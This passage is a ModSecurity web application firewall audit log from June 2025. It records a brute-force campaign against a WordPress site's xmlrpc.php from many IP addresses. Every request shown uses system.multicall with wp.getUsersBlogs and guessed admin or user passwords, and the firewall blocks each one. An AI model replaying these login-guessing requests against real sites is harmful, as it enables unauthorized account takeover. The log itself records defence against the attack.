Safari/537.36 --d3c7db31-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh21 --d3c7db31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3c7db31-E-- --d3c7db31-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 197.242.157.213 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100255807938 5127 (- - -) Stopwatch2: 1749100255807938 5127; combined=3786, p1=470, p2=3143, p3=0, p4=0, p5=102, sr=112, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3c7db31-Z-- --cff7cf35-A-- [05/Jun/2025:12:10:59 +0700] aEEm4-th7G2xELALzPYgzAAAAMA 103.236.140.4 35348 103.236.140.4 8181 --cff7cf35-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 45.117.81.105 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 45.117.81.105 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --cff7cf35-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehantix2022 --cff7cf35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cff7cf35-E-- --cff7cf35-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 45.117.81.105 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100259555236 4542 (- - -) Stopwatch2: 1749100259555236 4542; combined=3465, p1=365, p2=2941, p3=0, p4=0, p5=93, sr=76, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cff7cf35-Z-- --777f9918-A-- [05/Jun/2025:12:11:20 +0700] aEEm-Oth7G2xELALzPYg0wAAAMs 103.236.140.4 35368 103.236.140.4 8181 --777f9918-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.62.24.23 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.62.24.23 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --777f9918-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin12345! --777f9918-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --777f9918-E-- --777f9918-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.62.24.23 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100280689518 5582 (- - -) Stopwatch2: 1749100280689518 5582; combined=3966, p1=492, p2=3300, p3=0, p4=0, p5=102, sr=95, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --777f9918-Z-- --b66a6449-A-- [05/Jun/2025:12:11:31 +0700] aEEnA-th7G2xELALzPYg1gAAAM8 103.236.140.4 35376 103.236.140.4 8181 --b66a6449-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.95.2.150 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.95.2.150 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b66a6449-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin123!!! --b66a6449-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b66a6449-E-- --b66a6449-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.95.2.150 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100291915052 4837 (- - -) Stopwatch2: 1749100291915052 4837; combined=3724, p1=423, p2=3138, p3=0, p4=0, p5=96, sr=76, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b66a6449-Z-- --0efd071e-A-- [05/Jun/2025:12:11:38 +0700] aEEnCuth7G2xELALzPYg1wAAAM4 103.236.140.4 35378 103.236.140.4 8181 --0efd071e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.166.185.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.166.185.26 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0efd071e-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin123!!! --0efd071e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0efd071e-E-- --0efd071e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.166.185.26 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100298446522 5766 (- - -) Stopwatch2: 1749100298446522 5766; combined=4080, p1=499, p2=3416, p3=0, p4=0, p5=98, sr=91, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0efd071e-Z-- --cc037f53-A-- [05/Jun/2025:12:12:23 +0700] aEEnN-th7G2xELALzPYg3AAAANc 103.236.140.4 35394 103.236.140.4 8181 --cc037f53-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 213.231.7.92 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 213.231.7.92 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --cc037f53-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin2 --cc037f53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc037f53-E-- --cc037f53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.231.7.92 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100343259382 5699 (- - -) Stopwatch2: 1749100343259382 5699; combined=4109, p1=490, p2=3447, p3=0, p4=0, p5=101, sr=93, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc037f53-Z-- --b60e162c-A-- [05/Jun/2025:12:12:50 +0700] aEEnUuth7G2xELALzPYg4wAAAMU 103.236.140.4 35412 103.236.140.4 8181 --b60e162c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 188.225.21.131 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 188.225.21.131 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b60e162c-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin168 --b60e162c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b60e162c-E-- --b60e162c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 188.225.21.131 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100370255821 6383 (- - -) Stopwatch2: 1749100370255821 6383; combined=4420, p1=543, p2=3680, p3=0, p4=0, p5=117, sr=104, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b60e162c-Z-- --5dd5f32e-A-- [05/Jun/2025:12:13:02 +0700] aEEnXuth7G2xELALzPYg5wAAAMk 103.236.140.4 35424 103.236.140.4 8181 --5dd5f32e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 43.224.126.115 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 43.224.126.115 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5dd5f32e-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin123$$$ --5dd5f32e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dd5f32e-E-- --5dd5f32e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 43.224.126.115 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100382955891 6110 (- - -) Stopwatch2: 1749100382955891 6110; combined=4352, p1=535, p2=3639, p3=0, p4=0, p5=106, sr=107, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5dd5f32e-Z-- --5e5a0a51-A-- [05/Jun/2025:12:13:19 +0700] aEEnb-th7G2xELALzPYg7AAAAM0 103.236.140.4 35436 103.236.140.4 8181 --5e5a0a51-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 14.225.216.240 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 14.225.216.240 X-Forwarded-Proto: https Connection: close Content-Length: 476 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5e5a0a51-C-- system.multicallmethodNamewp.getUsersBlogsparamstest1234 --5e5a0a51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e5a0a51-E-- --5e5a0a51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.225.216.240 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100399016372 4806 (- - -) Stopwatch2: 1749100399016372 4806; combined=3537, p1=416, p2=2963, p3=0, p4=0, p5=92, sr=84, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e5a0a51-Z-- --0436d773-A-- [05/Jun/2025:12:14:16 +0700] aEEnqFwdJdhOudw5hdzO8QAAAJM 103.236.140.4 35464 103.236.140.4 8181 --0436d773-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 213.231.7.92 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 213.231.7.92 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0436d773-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin@12 --0436d773-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0436d773-E-- --0436d773-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.231.7.92 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100456889222 4595 (- - -) Stopwatch2: 1749100456889222 4595; combined=3531, p1=380, p2=2987, p3=0, p4=0, p5=96, sr=80, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0436d773-Z-- --d0c1a332-A-- [05/Jun/2025:12:14:27 +0700] aEEns-th7G2xELALzPYg-wAAAMU 103.236.140.4 35472 103.236.140.4 8181 --d0c1a332-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 45.117.81.105 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 45.117.81.105 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d0c1a332-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh@007 --d0c1a332-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0c1a332-E-- --d0c1a332-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 45.117.81.105 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100467085601 4641 (- - -) Stopwatch2: 1749100467085601 4641; combined=3505, p1=361, p2=2953, p3=0, p4=0, p5=111, sr=79, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0c1a332-Z-- --84cf3522-A-- [05/Jun/2025:12:14:47 +0700] aEEnx-th7G2xELALzPYhAQAAAMs 103.236.140.4 35488 103.236.140.4 8181 --84cf3522-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 197.242.157.213 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 197.242.157.213 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --84cf3522-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin@12345678 --84cf3522-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84cf3522-E-- --84cf3522-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 197.242.157.213 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100487561917 4802 (- - -) Stopwatch2: 1749100487561917 4802; combined=3670, p1=420, p2=3084, p3=0, p4=0, p5=97, sr=83, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84cf3522-Z-- --95edf77f-A-- [05/Jun/2025:12:15:09 +0700] aEEn3eth7G2xELALzPYhCAAAANI 103.236.140.4 35510 103.236.140.4 8181 --95edf77f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.33.66.226 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.33.66.226 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --95edf77f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh_password --95edf77f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95edf77f-E-- --95edf77f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.33.66.226 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100509838551 5000 (- - -) Stopwatch2: 1749100509838551 5000; combined=3535, p1=432, p2=2958, p3=0, p4=0, p5=86, sr=76, sw=59, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95edf77f-Z-- --281c4c3e-A-- [05/Jun/2025:12:16:07 +0700] aEEoF3-K7ToMdu-YSIIkUwAAAAY 103.236.140.4 35552 103.236.140.4 8181 --281c4c3e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 197.242.157.213 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 197.242.157.213 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --281c4c3e-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh!12345 --281c4c3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --281c4c3e-E-- --281c4c3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 197.242.157.213 (3+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100567156874 4611 (- - -) Stopwatch2: 1749100567156874 4611; combined=3566, p1=410, p2=2990, p3=0, p4=0, p5=97, sr=82, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --281c4c3e-Z-- --72c7f37c-A-- [05/Jun/2025:12:16:10 +0700] aEEoGuth7G2xELALzPYhFgAAAMc 103.236.140.4 35556 103.236.140.4 8181 --72c7f37c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.55.71 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.55.71 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --72c7f37c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh!12345 --72c7f37c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72c7f37c-E-- --72c7f37c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.55.71 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100570598798 5482 (- - -) Stopwatch2: 1749100570598798 5482; combined=3909, p1=481, p2=3253, p3=0, p4=0, p5=105, sr=83, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72c7f37c-Z-- --efd71a44-A-- [05/Jun/2025:12:17:01 +0700] aEEoTX-K7ToMdu-YSIIkWQAAAAw 103.236.140.4 35590 103.236.140.4 8181 --efd71a44-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 45.117.81.105 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 45.117.81.105 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --efd71a44-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin_password --efd71a44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --efd71a44-E-- --efd71a44-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 45.117.81.105 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100621140350 5656 (- - -) Stopwatch2: 1749100621140350 5656; combined=4138, p1=488, p2=3478, p3=0, p4=0, p5=100, sr=100, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --efd71a44-Z-- --8ec0cf2d-A-- [05/Jun/2025:12:17:46 +0700] aEEoeuth7G2xELALzPYhJgAAANg 103.236.140.4 35610 103.236.140.4 8181 --8ec0cf2d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.55.71 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.55.71 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8ec0cf2d-C-- 